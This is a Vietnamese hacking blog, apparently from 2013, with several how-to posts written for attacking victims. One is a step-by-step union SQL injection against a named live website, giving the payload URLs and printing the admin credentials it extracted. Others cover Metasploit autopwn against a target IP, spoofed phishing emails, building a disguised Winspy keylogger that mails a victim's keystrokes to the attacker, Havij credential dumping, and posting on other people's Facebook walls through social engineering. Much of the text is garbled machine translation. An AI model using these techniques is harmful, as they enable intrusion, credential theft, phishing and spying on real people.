Thứ Năm, 21 tháng 3, 2013

Tut hack SQL Injection cho newbie,tuy cũ mà lợi hại

MÌnh gà quá nên làm cái này hơi cùi bắp,mong các pro bỏ qua cho nhé,xâm nhập chưa đầy 2 phút là xong.

Định nghĩa Sql injection là gì?
Đơn giản injection tiếng việt là tiêm.Sql injection là tiêm các câu truy vấn vào.
Bài viết này mình hướng dẫn các bạn về web php,cơ sở dữ liệu phpmysql.
Sql injection chia làm 4 loại cơ bản:
+Inband
+Blind
+Timebase
+Out of band
Hôm nay sẽ có tut hướng dẫn các bạn khai thác website thông qua lỗi Inband.
Lý thuyết Inband -SQLi:
-Inband là phương pháp dùng hàm union để khai thác.
-Union là hàm lien kết 2 truy vấn (query)”Select….” Với nhau.
Từ version 5.0 trở đi ,mysql có thềm :
1 database hệ thống là information_schema
Các tabkle hệ thống của nó là tables,columns,table chi,….
2 table chúng ta cần quan tâm trong information_schema là tables và columns vì 2 table này chứ tên các table và column của website trên hệ thông
Cách khai thác gồm 4 bước
Bước 1:
Kiểm tran website có bị lỗi sql không
Bước 2:
Đếm số cột dùng order by đế xác định cột
Bước 3:
Sử dụng Union liên kết 2 câu truy vấn,tìm table cần khác thác thong qua information_schema.Tables
Bước 4:

Dựa trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên.
Bước 5:

Có talbe và column cần thiết rôi ta chỉ việc khai thác thong tin cần biết
Thực hành 
Victim:
http://www.kemlam.com
Lang thang tìm được cái link này 
http://www.kemlam.com/?content=detail&proID=10
Bước 1:
Đầu tiên kiểm tra xem nó có bị lỗi sql injection không đã
Mã:
http://www.kemlam.com/?content=detail&proID=10'
Mình thêm dấu nháy thử,vì giả sử câu truy vấn nó thế này 
$query = 'select * from sanpham where id=1'; 
Khi thêm dấu ' thì câu truy vấn sẽ là $query = 'select * from sanpham where id=1''; 
=>Có tới 3 dấu nháy=> PHP sẽ báo syntax error hoặc hiện trang khác so với bình thường
Bước 2:Đếm số cột dùng order by đế xác định cột.Mình thử đoán số column là 13.Nên order 13 thử.
Mã:
http://www.kemlam.com/?content=detail&proID=10 order by 13 --
==>Kết quả trả về bình thường.
Thử order by 14 xem sao
Mã:
http://www.kemlam.com/?content=detail&proID=10 order by 14 --

==>Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/kemlam/domains/kemlam.com/public_html/details.php on line 8
Vậy chỉ có 13 Column
Ở đây mình sử dụng dấu -- là đến loại bỏ những phần sau câu truy vấn,trong phpmysql nó dùng để ghi những comment
Bước 3:Sử dụng Union liên kết 2 câu truy vấn,tìm table cần khác thác thong qua information_schema.Tables
Đầu tiên thực hiện Union.
Mã:
http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 --
Id mình sửa lại Null để kết quả câu truy vấn trả về là rỗng,mới show được các column bị lỗi show ra là column số 4 5 6 7 8 9 10.Mình sử dụng hàm version() để show ra version .version() đặt ở 1 trong vị trí các column bị lỗi.ở đây mình đặt ở column số 4
Mã:
http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13 --
=>Kết quả 5.0.51a-community=>Ngon ăn ,vì mình đã ghi chú ý về version >5.0 trên rồi
Truy vấn các table cần khai thác thông qua information_schema.Tables
Mã:
http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,group_concat(table_name) ,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--
=>Kết quả show ra các table:ads_vn,category_vn,cust_vn,hitcounter,notice ,onlin e,pages_vn,product_vn,tinnoibat_vn,tintuc_vn,users
Đến đây mình đoán table users là table chứa user và password admin.(Kỹ năng của mỗi người thôi)
Bước 4[IMG]file:///C:/Users/longvu/AppData/Local/Temp/msohtmlclip1/01/clip_image001.gif[/IMG]ựa trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên.
Mã:
http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,group_concat(column_name) ,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--
=>Kq trả về các column trong table users:User_ID,Username,realName,Pass,uRight 
đến đây có bạn sẽ thắc mắc,Vì sao talbe_name=CHAR(117, 115, 101, 114, 115)-- mà không phải là table_name=users?
Đơn giản vì ở đây,trong file php.ini magic_quote đang ở chế đố on,nên ta phải đổi qua kiểu char hoặc kiểu ascii,trên đó mình chuyển sang kiểu char.
Bước 5:Có talbe và column cần thiết rôi ta chỉ việc khai thác thong tin cần biết
2 column mình quan tâm là Username,Pass vì mình đoán user và password sẽ đặt ở đây.
Lấy thông tin bằng câu truy vấn đơn giản
Mã:
http://www.kemlam.com/?content=detai...D=Nul l% 20UNION SELECT 1,2,3,4,group_concat(Username,0x2f,Pass),6,7,8,9,1 0,11,12,13 from users--

=>admin/qsv50502415,kemlam/123654,dinhtuan/123654 
Có user và password giờ tim link admin đăng nhập thôi.
Tuy nhiên không khuyến khích các bạn phá hoại website người khác,nếu muốn thể hiện thì up 1 file .txt rồi gửi link cho bạn bè là được rồi.

Đây là cách 2 anh em xem nhé :


Thứ Tư, 13 tháng 3, 2013

Làm thế nào để Hack nạn nhân, s máy tính với Nmap và Metasploit

Hôm nay tôi đang viết một hướng dẫn về hacking với Nmap với Metasploit. D/l đầu tiên Metasploit từ trang web chính thức, liên kết:
Mã số:
http://www.metasploit.com/ 
Cho tất cả những gì cài đặt, và hướng tới kết thúc của tiến trình cài đặt, nó sẽ hỏi nếu bạn muốn Nmap cài đặt cũng 
chọn có.

Một khi bạn đã cài đặt màn hình Metasploit sẽ mở ra như hình dưới đây...




Bây giờ gõ db_create 

Một khi bạn đã gõ mà loại nmap

Điều này tải nmap, như được hiển thị dưới đây...


Bạn cần phải cấu hình quét của bạn bây giờ, tôi thường làm một đơn giản - sT - sV quét đó sẽ cho chúng tôi biết dịch vụ chạy trên máy tính của nạn nhân, và mở cổng bây giờ gõ nmap - sT - sV xxx.xxx.xxx.x (x là nạn nhân số Ip), Demonstrated dưới đây.


Bây giờ cho nó 5 phút để hoàn thành quét, khi đó là hoàn toàn nếu may mắn của bạn bạn sẽ nhận được một phản ứng như thế này...


Điều này về cơ bản là một danh sách các cổng mở và dịch vụ chạy trên máy tính mục tiêu, bây giờ tính năng tiện dụng của khuôn khổ metasploit 3.3 là tính năng autopwn, điều này về cơ bản tìm kiếm và chạy tất cả các khai thác phù hợp trong cơ sở dữ liệu Metasploit chống lại các máy tính mục tiêu và nếu thành công sẽ tạo ra một vỏ hoặc tương tự như đặc quyền cho những kẻ tấn công.

Bây giờ, một khi bạn có nmap kết quả giao trở lại để bạn hiển thị mở cổng và dịch vụ loại db_autopwn -p -t -e, từ thời điểm này bạn sẽ có quyền truy cập vào máy tính nạn nhân thông qua một khai thác ra mắt thành công hoặc bạn sẽ nhận được một phản ứng nói máy không dễ bị tổn thương đến bất kỳ khai thác trong cơ sở dữ liệu Metasploit. Thật không may, trên máy tính cụ thể này tôi tìm thấy nó không phải là dễ bị tổn thương như hình dưới đây chứng minh.Chúc May mắn.

Giả Mailer: Làm thế nào để gửi Email chưa xác định người

Như chúng ta đều biết, lừa đảo trực tuyến là một trong những phương pháp hữu ích và đơn giản nhất để hack tài khoản email. Trong khi lừa đảo tài khoản email của bất kỳ ai, bạn cần phải gửi email có chứa liên kết tới trang lừa của bạn cho các nạn nhân. Các nạn nhân sẽ bấm vào liên kết này chỉ nếu ông tìm thấy thư chính hãng. Vì vậy, chúng tôi có thể sử dụng
Bưu phẩm giả mạo
để làm cho thư này xuất hiện chính hãng.
làm thế nào để gửi email chưa xác định người.
Trong các bên dưới bài viết, tôi đã gửi một bưu phẩm giả đó là hữu ích để gửi email chưa xác định người cho nạn nhân của bạn.

Giả Mailer để gửi Email chưa xác định người:

1. Đến trang web giả mạo Mailer để gửi email chưa xác định người.

2. Bây giờ, nhập thông tin như hiển thị:

Từ tên: Tên người gửi sẽ xuất hiện trên Email
Email: Gửi địa chỉ Email
Để: Địa chỉ email nạn nhân
Chủ đề: Chủ đề của Email
Content-type: Chọn văn bản/html
Văn bản: Nội dung thư của bạn. Đặt một cái gì đó mà sẽ làm cho nạn nhân của bạn nhấp vào liên kết lừa của bạn.

3. Bây giờ, nhập captcha và nhấn vào gửi.

4. Nạn nhân sẽ nhận được email như thế này:


Vì vậy, bạn bè, tôi đoán điều này giả Mailer là khá dễ dàng sử dụng và cũng rất tiện dụng để gửi email chưa xác định người bạn bè hoặc nạn nhân của bạn. Nếu bạn tìm thấy bất kỳ vấn đề trong việc sử dụng này
Giả Mailer để gửi email chưa xác định người,
Xin vui lòng đề cập đến nó trong ý kiến.

Cập Nhật : đối với một thêm trang web để gửi email chưa xác định người bấm vào ở đây 

Thưởng thức giả Mailer để gửi email chưa xác định người cho nạn nhân của bạn...

Làm thế nào để mở khóa các 3 G USB modem

Bản tóm tắt này không có sẵn. Vui lòng nhấp vào đây để xem bài đăng.

Hack Hotmail, Facebook mật khẩu tài khoản của Winspy keylogger

Trong bài viết của tôi làm thế nào để hack Myspace tài khoản/hồ sơ mật khẩu , tôi đã đề cập về cách phổ biến được sử dụng để hack Myspace tài khoản/hồ sơ mật khẩu. Trong những cách, Winspy keylogging là đơn giản nhất. Vì vậy, tôi sẽ đề cập đến về Winspy Keylogging như mật khẩu tài khoản Myspace hacking phương pháp trên đây. Nó rất dễ dàng để hack myspace tài khoản mật khẩu bằng cách sử dụng winspy keyloggerTrong bài này, tôi sẽ nhấn mạnh vào Win-gián điệp keylogger như Myspace mật khẩu hacking phần mềm.

Winspy keylogger để hack Facebook, Gmail tài khoản mật khẩu:

1. Trước hết tải về Winspy keylogger phần mềm từ liên kết đưa ra dưới đây:

Tải về Winspy Keylogger (Originale cung cấp giá: $39)

2. Sau khi tải về, chạy mật khẩu myspace hacking phần mềm. Trên chạy, một hộp thoại sẽ được nhắc nhở. Bây giờ, tạo một user và mật khẩu trên chạy đầu tiên và nhấn áp dụng mật khẩu. Nhớ mật khẩu này là nó yêu cầu mỗi khi bạn bắt đầu Winspy và thậm chí trong khi gỡ bỏ cài đặt. 

3. Bây giờ, một hộp sẽ đi, giải thích cho bạn các phím nóng (Ctrl + Shift + F12) để bắt đầu phần mềm keylogger Winspy này để hack myspace tài khoản mật khẩu.



4. Bây giờ, trên nhấn phím nóng, một hộp đăng nhập sẽ yêu cầu user và mật khẩu. Nhập họ và nhấn OK.



5. Bây giờ, màn hình chính của Winspy sẽ được hiển thị như minh hoạ trong hình dưới đây:



6. Chọn từ xa ở đầu trang, sau đó từ xa cài đặt.

7. Về làm điều này, bạn sẽ nhận được một hộp bật lên, như minh hoạ trong hình ảnh. Bây giờ, hãy điền vào các thông tin sau trong hộp này.



.User - nhập tên của nạn nhân
.file tên - tên tập tin được gửi đi. Sử dụng tên như vậy mà nạn nhân sẽ yêu thương để chấp nhận nó.
.file biểu tượng - giữ nó như vậy
.Picture - chọn ảnh bạn muốn áp dụng cho các keylogger.

Trong textfield "Email keylog để", nhập địa chỉ email của bạn. Tài khoản Hotmail không chấp nhận keylog tập tin, vì vậy sử dụng một id email.

Thats nó. Điều này nhiều là đủ. Nếu bạn muốn, có thể thay đổi các cài đặt khác cũng.

8. Sau khi bạn đã hoàn tất thay đổi thiết đặt, bấm vào "Tạo tập tin từ xa". Bây giờ chỉ cần thêm hình ảnh của bạn vào một kho lưu trữ winrarBây giờ, những gì bạn phải làm là chỉ gửi tệp keylog này cho nạn nhân của bạn. Khi nạn nhân sẽ mở tệp này, tất cả các tổ hợp phím gõ của nạn nhân sẽ được gửi đến hộp thư của bạn.

Vì vậy, bạn sẽ nhận được tất cả các mật khẩu của mình và do đó sẽ có thể để hack của mình gửi email tài khoản và thậm chí cả mật khẩu tài khoản Myspace.

Website Hacking: Làm thế nào để Hack trang web bằng cách sử dụng Havij SQL Injection

Đã tôi đã viết rất nhiều bài viết trên trang web hacking trong đó tôi đã giải thích làm thế nào để tìm thấy trang web sql dễ bị tổn thương và làm thế nào để hack rằng cơ sở dữ liệu trang web vv, vào ngày hôm nay trong bài viết này tôi sẽ viết trên nhiều trang web hack hướng dẫn sử dụng Havij SQL InjectionSử dụng Havij SQL Injection, bạn có thể dễ dàng hack trang web tên người dùng và mật khẩu. 

Havji là một công cụ tiêm SQL. Nhưng có thêm kỹ năng tuyệt vời như tìm bảng quản trị, nứt băm. Bạn có thể sử dụng nó thay vì cách thông thường của SQL injection. Nó đặc biệt là cho người mới bắt đầu một chương trình uselful.

Bằng cách sử dụng công cụ Havij SQL Injection bạn sẽ nhận được dưới thông tin của trang web,
  • Cơ sở dữ liệu tên
  • Giải mã MD5 mã
  • Bảng tên
  • Cột tên
  • Cột dữ liệu
Đừng quên để đăng ký với nguồn cấp dữ liệu RSS của chúng tôi

Các bước để Hack trang web bằng cách sử dụng Havij SQL Injection


Bước 1: Đầu tiên tải về Havij SQL Injection

Bước 2: Chạy phần mềm Havij SQL Injection và sao chép và dán liên kết trang web dễ bị tổn thương như minh hoạ trong hình,

Tham khảo các bài viết trước đây của trang web hack để tìm trang web dễ bị tổn thương.


Bước 3: Bây giờ hãy nhấp vào nút "Phân tích"


Bước 4: Sau đó, nó cho thấy một số thông điệp đó. Là cảnh báo về nó và phải hiển thị kiên nhẫn cho đôi khi tìm thấy nó vulernable và loại tiêm và nếu máy chủ db mysql và nó sẽ tìm thấy cơ sở dữ liệu tên.Sau đó sau khi nhận được cơ sở dữ liệu của nó là tên như xxxx_xxxx


Bước 5: Sau đó di chuyển đến một chiến dịch để tìm bảng bằng cách nhấp vào "bảng" như hình hiển thị. Bây giờ bấm "Nhận được bảng" sau đó chờ đợi một thời gian nếu cần thiết


Bước 6: Sau khi được thành lập các bảng, bạn có thể thấy sẽ có "người dùng" đặt đánh dấu vào nó và nhấp chuột vào "nhận được cột" tab như minh hoạ trong hình


Bước 7: Trong đó chỉ cần đặt đánh dấu tên người dùng và mật khẩu và nhấp vào "Nhận được dữ liệu"


Cuối cùng, bạn có bây giờ tên người dùng và mật khẩu của admin...

Đèo sẽ nhận được là md5, bạn có thể crack nó cũng sử dụng công cụ này như minh hoạ trong hình.

Tường Facebook Hacking | Đăng một trạng thái và tải lên hình ảnh trên bất kỳ tài khoản Facebook tường


Trong bài viết trước, chúng tôi đã đã thảo luận về làm thế nào để hack mật khẩu tài khoản facebook bằng cách sử dụng keyloggerTôi cũng chia sẻ các phương pháp khác quá nhưKeyloggerTabnabbingDoxing phương pháp mà bạn có thể sử dụng nó cho hacking của bạn bè hoặc nạn nhân facebook mật khẩu tài khoản. Hôm nay trong bài viết này tôi sẽ giải thích cho bạn làm thế nào để gửi một tình trạng và tải lên các hình ảnh trên bất kỳ bức tường tài khoản facebook. Điều này thực sự không hacking kỹ thuật, nhưng những gì bạn sẽ đăng trên một bức tường là hoạt động bất hợp pháp:)...

hack facebook wall

Trên thực tế facebook cũng cho phép người dùng gửi bất kỳ tin nhắn trên tường của mình sử dụng dịch vụ email mà không cần đăng nhập vào vào tài khoản facebook. Ở đây trong bức tường này hacking phương pháp bạn sử dụng đó cùng một email id của nạn nhân của bạn để gửi tin nhắn hoặc hình ảnh của bạn vào tài khoản facebook của mình. Bạn cần chỉ cần gửi email id của nạn nhân của bạn, dưới tôi đã giải thích làm thế nào để nhận được rằng id email và làm thế nào để gửi tin nhắn trên nạn nhân bạn tường facebook.

Đăng một trạng thái và tải lên hình ảnh trên bất kỳ tài khoản Facebook tường

Bước 1) Đi đến m.facebook.com/upload.php / , bạn sẽ thấy một email duy nhất dưới "gửi nó bằng email" đó là email duy nhất của bạn. Những gì chúng tôi đang cố gắng làm là nhận được nạn nhân của bạn độc đáo email bởi xã hội kỹ thuật chúng, tôi sẽ đăng một ví dụ dưới đây trong bước số 2.

hack facebook password

Bước 2) Liên lạc với nô lệ của bạn. Gửi cho anh ta một thông báo nói rằng một cái gì đó như "Hey có thể bạn cho tôi biết email trên Trang này: www.m.facebook.com/upload.php, tôi cần nó vì vậy tôi có thể tải lên một cái gì đó qua email của tôi." Bạn có thể tạo ra phương pháp riêng của bạn cho việc này. Một phương pháp nào được sử dụng này email spoofer "http://emkei.cz/" và gửi cho họ một tin nhắn điền tên. Ví dụ, từ tên: nhân viên Facebook, email: facebook.com, vv yêu cầu họ cho email tại m.facebook.com/upload.php

hack facebook password

Bước 3) Một khi bạn có SE có nạn nhân duy nhất email của bạn, đi đến tài khoản hotmail/gmail của bạn và gửi email đến email duy nhất, ông đã cho bạn. Trong các chủ đề hộp là trạng thái bạn muốn đi lên trên tường của mình, ví dụ như; "ở đây có văn bản" hộp chính cho tập tin đính kèm hình ảnh bạn muốn đính kèm, tôi không nghĩ rằng bạn có thể tải lên các hình ảnh nhiều hơn 1 mỗi trạng thái, bạn sẽ cần phải thử nó:). Sau khi bạn gửi nó, nó sẽ xuất hiện trên tường của ông, đơn giản như vậy.

hack facebook password

Cập nhật lúc: Nếu bạn muốn hack Gmail, Myspace và mật khẩu tài khoản email khác, xin vui lòng sử dụng các tốt nhất Hacking phần mềm,
Vì vậy, guys, tôi hy vọng điều này
Tường Facebook Hacking | Đăng một trạng thái và tải lên hình ảnh về bất kỳ tài khoản Facebook tường hướng dẫn
sẽ giúp bạn để hack facebook tường bài hoặc trạng thái của bất kỳ người dùng facebook. Nếu bạn có bất kỳ vấn đề trong trên hướng dẫn, xin vui lòng đề cập đến nó trong ý kiến.
Thưởng thức Facebook hacking...